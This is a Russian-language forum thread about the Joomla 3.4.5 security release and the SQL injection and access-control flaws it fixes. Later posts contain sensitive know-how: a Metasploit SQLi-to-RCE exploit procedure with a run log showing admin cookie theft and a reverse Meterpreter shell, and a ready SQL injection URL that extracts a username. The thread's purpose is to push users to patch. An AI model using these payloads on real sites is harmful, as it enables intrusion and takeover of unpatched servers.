×
HeadHunter and Superjob rezume updater on Ruby on Rails (21 авг 2017)

Практикуемся в написании кода под rails.

Важно Joomla 3.4.5. Important Security Announcement

Больше
2 года 1 день назад #1 от serge
serge создал эту тему: Joomla 3.4.5. Important Security Announcement
Внимание, 22 октября ожидается Joomla 3.4.5 security release, который, по понятным причинам, необходимо будет как можно более оперативно применить на своих joomla-сайтах.
Никакой информации о найденной в ядре Joomla уязвимости команда безопасности (The Joomla security team (JSST)), как обычно, заранее не предоставляет:

Joomla 3.4.5 release containing a security fix will publish Thursday 22nd October at approximately 14:00 UTC .
The Joomla security team (JSST) has been informed of a critical security issue in the Joomla core.
Since this is a very important security fix, please be prepared to update your Joomla installation's next Thursday.
Until the release is out, please understand that we cannot provide any further information.


Официальный анонс о предстоящем релизе безопасности доступен на Joomla.org.

А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
1 год 11 мес. назад - 1 год 11 мес. назад #2 от Aleksej
Aleksej ответил в теме Joomla 3.4.5. Important Security Announcement
Ну и вот.

Доступна к загрузке Joomla! 3.4.5. Это релиз безопасности для Joomla 3.x, настоятельно рекомендуется обновить Joomla немедленно.

Релиз содержит изменения, направленные на исправление найденных уязвимостей. Всего их три, одна из которых - уязвимость высокого уровня опасности. Настоятельно рекомендуем обновиться до Joomla 3.4.5 немедленно. Полный список ошибок доступен, как обычно, в Github.

Описание важных изменений:

  1. SQL Injection (подвержены версии Joomla начиная с 3.2 до 3.4.4) - уязвимость высокого уровня опасности. Недостаточная фильтрации запроса данных приводит к уязвимости SQL Injection.
  2. Core - ACL Violations (подвержены версии Joomla начиная с 3.2 до 3.4.4) - уязвимость среднего уровня опасности. Позволяет получить доступ к данным com_content доступ к которым должен быть ограничен.
  3. Core - ACL Violations (подвержены версии Joomla начиная с 3.0 до 3.4.4) - уязвимость среднего уровня опасности. Позволяет получить доступ к данным com_contenthistory доступ к которым должен быть ограничен.

Последнее редактирование: 1 год 11 мес. назад от Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
1 год 11 мес. назад - 1 год 11 мес. назад #3 от tekumze
tekumze ответил в теме Joomla 3.4.5. Important Security Announcement
Нашел эффектное видео иллюстрирующее эту атаку. Смотреть всем кто еще не обновился. ;)





Примечание модератора. Изменил ссылку на видео, руководствуясь данным сообщением .
Последнее редактирование: 1 год 11 мес. назад от p.rishard. Причина: Изменена ссылка на видео

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
1 год 11 мес. назад #4 от serge
serge ответил в теме Joomla 3.4.5. Important Security Announcement
Описание и steps to reproduce:

Add Joomla Content History SQLi RCE exploit module

This module exploits Asaf Orpani@Trustwave's Joomla SQLi in versions 3.2 up to 3.4.4. After gaining Administrator access it will create an extra template file with our payload, which provides a shell.

Steps to reproduce:

Deploy github.com/joomla/joomla-cms/releases/do...ble-Full_Package.zip on a linux VM (tested on Ubuntu 15.04)
Install through the web browser, keep everything default
Login to the administrator portal at http:///administrator
Click on "New Article" -> Title: "Anything" -> Body: "Anything" -> Save (Needed for some actual data in the _ucm_history table)
Make sure that you are still logged in as a Administrator (Super User) when you run the exploit module (As the SQLi will retrieve the admin session)
Run the exploit! :)

msf > use exploit/unix/webapp/joomla_contenthistory_sqli_rce
msf exploit(joomla_contenthistory_sqli_rce) > set RHOST 192.168.2.130
RHOST => 192.168.2.130
msf exploit(joomla_contenthistory_sqli_rce) > exploit

[*] Started reverse handler on 192.168.2.50:4444
[*] 192.168.2.130:80 - Retrieved table prefix [ n13xt ]
[*] 192.168.2.130:80 - Retrieved admin cookie [ lvhjcpr08827qa2g45l537ct67 ]
[*] 192.168.2.130:80 - Retrieved unauthenticated cookie [ 8ec83d68fe7891e981f2e286f15b31d3 ]
[*] 192.168.2.130:80 - Successfully authenticated as Administrator
[*] 192.168.2.130:80 - Creating file [ b6iu7Dy.php ]
[*] 192.168.2.130:80 - Following redirect to [ /administrator/index.php?option=com_templates&view=template&id=503&file=L2I2aXU3RHkucGhw ]
[*] 192.168.2.130:80 - Token [ b062c55811a959dd9cd0f209311cecdb ] retrieved
[*] 192.168.2.130:80 - Template path [ /templates/beez3/ ] retrieved
[*] 192.168.2.130:80 - Insert payload into file [ b6iu7Dy.php ]
[*] 192.168.2.130:80 - Payload data inserted into [ b6iu7Dy.php ]
[*] 192.168.2.130:80 - Executing payload
[*] Sending stage (33068 bytes) to 192.168.2.130
[*] Meterpreter session 1 opened (192.168.2.50:4444 -> 192.168.2.130:46526) at 2015-10-23 16:55:26 +0700
[+] Deleted b6iu7Dy.php

meterpreter > getuid
Server username: www-data (33)


Источник

А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
1 год 11 мес. назад #5 от tekumze
tekumze ответил в теме Joomla 3.4.5. Important Security Announcement
Ха! Этог уже оно и есть? оперативно. :laugh:

http://my_site.ru/index.php?option=com_contenthistory&view=history&item_id=1&type_id=1&list[ordering]&list[select]=(select%201%20from%20(select%20count(*),concat((select%20username%20from%20%23__users%20limit%200,1),floor(rand(0)*2))%20from%20information_schema.tables%20group%20by%202)x)

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.